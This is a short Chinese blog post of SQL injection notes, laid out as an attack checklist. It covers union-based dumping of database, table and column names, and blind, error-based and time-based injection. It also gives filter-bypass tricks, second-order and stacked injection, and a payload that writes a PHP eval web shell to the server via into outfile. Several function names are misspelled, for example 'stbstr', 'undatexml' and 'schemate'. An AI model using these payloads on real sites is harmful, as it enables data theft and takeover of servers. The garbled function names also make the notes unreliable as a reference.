简单的SQL渗透

判断: id= 1 2 ‘  ') ‘)      "   ")  "))  构成闭合尝试报错判断注点

        查询语句:

        order by 字段查询 报错反馈字段  or and 的使用

        简单的显错注入语句联合查询

        union select 1,2,3--+  更改2的值:   单个查询使用limit(0,1)

        查库

select schema_name from information_schema.schemate

        查表                 有时直接在语句后空格拼接limit 1,1

select table_name from information_schema.tables where table_schema=database()

        查列           

select column_name from information_schema.columns where table_name='表名'(有时用0x 16)

        !!可用group_concat多个查询,但长度不够会出现显示不出所有信息

        

        读写:

        into dumpfile()

        into outfile()

        load_file()

        union select 1,'<?php eval($_REQUEST[8]?>'into outfile'路径位置'最好用双斜杠 即读写

        盲注:

        length()显示字符串长度

       stbstr()截取字符串

        ASCII()变为ascii码

        

        报错:

         concat(0x7e,(查询语句),0x7e)

        undatexml(1,2,3)--+其中2可以变为concat(0x7e,(select database()),0x7e)

        时间型sleep()

        if(1,2,3)第一个语句正确执行2 错误执行3

        burp 暴力破解

        万能密码 加查询语句达到渗透

        请求头 ,cookie注入       

        过滤:

         Base64 编码解码

        不能注释掉尾部语句 可用 and '1'='1

        二次注入

        先写入再利用 比如修改admin的密码 可恶意注册admin'#这样的一个账号 改账号密码使 admin的密码也被修改 从而登录admin

        &&和and一致 ||和or一致 可将&&进行URL转码

        用%0a和%a0替代空格 或者用()包裹 建议多用括号

        select部分大小写绕过过滤  可用盲注绕过select 和union

        参数污染相同的参数不同的处理方式造成

        防止'可以用宽字节 后加入16进制转义

        post可在抓包后改Hex表中的 也可以用3字节汉字来绕过

        堆叠注入 可以直接加数据或者恶意删除改密码也行  可以加一句话木马用菜刀

        

        

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值